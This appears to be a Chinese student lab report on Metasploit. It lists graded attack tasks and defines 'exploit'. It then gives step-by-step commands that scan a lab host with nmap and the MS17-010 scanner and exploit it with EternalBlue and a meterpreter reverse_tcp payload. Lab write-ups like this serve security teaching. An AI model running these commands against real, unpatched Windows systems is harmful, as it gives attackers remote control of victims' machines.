1.实验目的
掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路
2.实验内容
- 一个主动攻击实践,如ms08_067; (1分)
- 一个针对浏览器的攻击,如ms11_050;(1分)
- 一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
3.基础问题回答
用自己的话解释什么是exploit,payload,encode
exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到攻击的最终目的4.实验步骤
任务一--Windows服务渗透攻击——MS17-010安全漏洞
打开MSF输入
nmap -O -Pn 192.168.80.133
- 利用auxiliary辅助模块进行扫描
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.80.133
run
- 根据要求设置并攻击
输入back退回,然后依次输入
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.80.132
set RHOST 192.168.80.133
exploit